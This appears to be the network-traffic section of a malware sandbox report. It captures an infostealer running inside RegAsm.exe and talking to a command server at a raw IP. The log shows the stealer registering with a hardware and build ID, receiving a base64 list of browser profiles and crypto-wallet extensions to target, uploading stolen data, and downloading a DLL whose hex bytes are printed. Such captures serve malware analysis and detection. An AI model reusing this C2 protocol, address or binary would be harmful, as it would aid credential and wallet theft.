2024-09-21 16:51:28 UTC	10164	IN	Data Raw: 6d 6d 75 6e 69 74 79 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 4d 4d 55 4e 49 54 59 5f 43 44 4e 5f 41 53 53 45 54 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 61 73 73 65 74 73 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 53 54 4f 52 45 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 6f 72 65 2e 61 6b 61 6d 61 69 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 50 55 42 4c 49 43 5f 53 48 41 52 45 Data Ascii: mmunity.akamai.steamstatic.com\/","COMMUNITY_CDN_ASSET_URL":"https:\/\/cdn.akamai.steamstatic.com\/steamcommunity\/public\/assets\/","STORE_CDN_URL":"https:\/\/store.akamai.steamstatic.com\/","PUBLIC_SHARE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:29 UTC	188	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:30 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:30 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 30 39 42 32 32 36 36 34 35 31 31 39 39 31 36 32 37 33 33 37 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="hwid"7E09B22664511991627337-a33c7340-61ca------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------EGCBFIEHIEGCAAAKKKKE--
2024-09-21 16:51:31 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:31 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|e95c9ed0c509803496bb8eb56f9969f7\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49742	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:32 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJKEBFBFHIJJKEHDHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:32 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 4a 4b 45 42 46 42 46 48 49 4a 4a 4b 45 48 44 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------BFIJKEBFBFHIJJKEHDHIContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------BFIJKEBFBFHIJJKEHDHICont
2024-09-21 16:51:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:33 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:33 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAAAKJDAAFBAAKEBAAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:33 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 41 4b 4a 44 41 41 46 42 41 41 4b 45 42 41 41 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------BAAAKJDAAFBAAKEBAAKFContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------BAAAKJDAAFBAAKEBAAKFCont
2024-09-21 16:51:34 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:34 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49744	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:35 UTC	280	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGDHCGCBKFHJKEBKFBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:35 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 44 48 43 47 43 42 4b 46 48 4a 4b 45 42 4b 46 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------HDGDHCGCBKFHJKEBKFBFContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------HDGDHCGCBKFHJKEBKFBFCont
2024-09-21 16:51:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:36 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49745	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:36 UTC	281	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDHDGCBFBKECBFHCAF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Content-Length: 7633 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:36 UTC	7633	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 39 35 63 39 65 64 30 63 35 30 39 38 30 33 34 39 36 62 62 38 65 62 35 36 66 39 39 36 39 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 38 63 64 32 35 30 62 31 35 65 36 36 36 65 35 66 37 32 66 63 66 35 63 61 61 36 63 62 31 33 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 48 44 47 43 42 46 42 4b 45 43 42 46 48 43 41 46 0d 0a 43 6f 6e 74 Data Ascii: ------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="token"e95c9ed0c509803496bb8eb56f9969f7------EGIDHDGCBFBKECBFHCAFContent-Disposition: form-data; name="build_id"58cd250b15e666e5f72fcf5caa6cb131------EGIDHDGCBFBKECBFHCAFCont
2024-09-21 16:51:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-21 16:51:37 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49746	116.203.165.127	443	7520	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 16:51:37 UTC	196	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 116.203.165.127 Connection: Keep-Alive Cache-Control: no-cache
2024-09-21 16:51:38 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 21 Sep 2024 16:51:38 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Saturday, 21-Sep-2024 16:51:38 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-21 16:51:38 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-09-21 16:51:38 UTC	16384	IN	Data Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
